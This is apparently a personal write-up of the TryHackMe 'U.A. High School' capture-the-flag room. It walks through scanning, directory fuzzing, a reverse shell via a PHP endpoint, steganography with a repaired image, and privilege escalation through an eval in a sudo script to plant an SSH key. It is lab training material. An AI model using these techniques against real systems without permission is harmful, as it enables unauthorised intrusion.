TryHackMe - U.A. High School Writeup
“U.A. High School” CTF named is one of the “easy” rooms in THM.
I start with an NMAP scan, I see that ports 80 and 22 are open.
nmap -n -sSCV <ip-address>
I proceed to the web page and a normal, clue-free page greets me.
I scroll through the links on the page, but I can’t find anything interesting there either, and then I notice the /assets path.
When I scroll to /assets, I am greeted by a blank page that does not give an error, I realise that something is strange and I try index.html, index.php.
.php worked no errors.
I’ve done a lot of checking and experimenting with ffuf, gobuster, dirb, nikto, burp, etc. up to this point** finally one of them worked.
dirsearch -u http://<ip-address>/assets/index.php
The first thing that came to my mind was that I could get a reverse shell from here, and I immediately went to revshells.
I prepared the payload and then received the connection through the listener I created with Netcat.
After connecting, I did some research and using the clue given by the machine, I came to more than one conclusion.
One of them was a base64 encoded password.
I was sure I would use this password somewhere, so I wrote it down and continued.
One of the other conclusions I came to was that the clue given by the machine was a ‘jpg’ file, which was the real payoff for me.
I then pulled this .jpg file to my machine with the wget command and after realising that it was corrupted, I opened it with ‘hexeditor’.
After opening it with the editor, I realised that the extension inside was png and used the ‘jpg hex signatures’ from this link ‘https://en.wikipedia.org/wiki/List_of_file_signatures’ to fix it.
and then my file was fixed!
That’s when I remembered the password I had written down, gave it to ‘Steghide’ and found the secret clue in the file.
Now it’s the turn of the user ‘deku’. I noticed the existence of the user when I visited the /home directory.
Privilege Escalation is next.
I run sudo -l and move to the .sh file in /opt.
I am reading the contents of the .sh script and trying to understand what it does.
I’m going to focus on the ‘eval’ section, this is where we can do the authorisation upgrade.
Firstly, I create a publickey with ssh-keygen in my local.
and then I authorize my file.
I copy the information in the .pub file and after moving to the target machine, I run the script and ensure that it is registered in the .authorized_keys file.
Now all that’s left is to connect locally.
and we take the last flag and terminate the machine.
I hope I have not made any spelling mistakes or misinformation. Please let me know if you notice any omissions or errors.
For suggestions and questions, you can reach me on LinkedIn.
